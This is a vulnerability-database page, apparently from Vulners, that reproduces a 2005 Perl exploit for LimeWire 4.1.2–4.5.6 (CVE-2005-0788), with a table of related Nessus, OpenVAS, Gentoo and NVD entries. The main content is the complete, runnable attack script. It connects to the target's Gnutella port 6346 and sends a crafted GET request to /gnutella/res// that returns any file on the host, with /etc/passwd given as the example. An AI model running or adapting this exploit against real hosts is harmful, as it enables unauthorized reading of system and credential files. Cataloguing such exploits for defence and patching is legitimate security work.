Lucene search
+L

LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read

🗓️ 14 Mar 2005 00:00:00Reported by lammatType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

LimeWire 4.1.2 - 4.5.6 'GET' Remote File Read Perl Exploi

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
LimeWire < 4.8.0 Directory Traversal Arbitrary File Access
15 Mar 200500:00
nessus
Tenable Nessus
GLSA-200503-37 : LimeWire: Disclosure of sensitive information
1 Apr 200500:00
nessus
Tenable Nessus
Lime Wire Multiple Remote Unauthorized Access
6 Apr 200500:00
nessus
CVE
CVE-2005-0788
20 Mar 200505:00
cve
Cvelist
CVE-2005-0788
20 Mar 200505:00
cvelist
EUVD
EUVD-2005-0789
7 Oct 202500:30
euvd
Gentoo Linux
LimeWire: Disclosure of sensitive information
31 Mar 200500:00
gentoo
NVD
CVE-2005-0788
14 Mar 200505:00
nvd
OpenVAS
Lime Wire Multiple Remote Unauthorized Access
3 Nov 200500:00
openvas
OpenVAS
Gentoo Security Advisory GLSA 200503-37 (LimeWire)
24 Sep 200800:00
openvas
Rows per page
#!/usr/bin/perl
#Limewire 4.1.2 - 4.5.6 remote and fucking lame exploit	    *
#                written by lammat 			   *
#              http://grpower.ath.cx		          *
#		[email protected]			 *
#	      Discovered by Kevin Walsh                 *

use IO::Socket;

$host = @ARGV[0];
$file = @ARGV[1];

unless (@ARGV == 2) {
print "usage: $0 host file\n";
print "E.g: $0 10.0.0.2 /etc/passwd\n";
exit
}

@req = "GET /gnutella/res//$file HTTP/1.1\n
User-Agent: I-AM-AN-ATTACKER/1.0\n
Host: 0.0.0.0:0\n
Accept: */*\n
Connection: Keep-Alive";

print "[+] checking if host exists...\n";
$string = inet_aton($host) || die "[-] Host does not exist...\n";

print "[+] $host exists...connecting...\n";
$web = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "6346",
)
or die "cannot connect to the $host";
if ($web)
{
print "[+] Connected...sending the request...\n";

print $web "@req";


while ( <$web> )
{ print }
close $web;
}

# milw0rm.com [2005-03-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Nov 2017 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
EPSS0.06918
37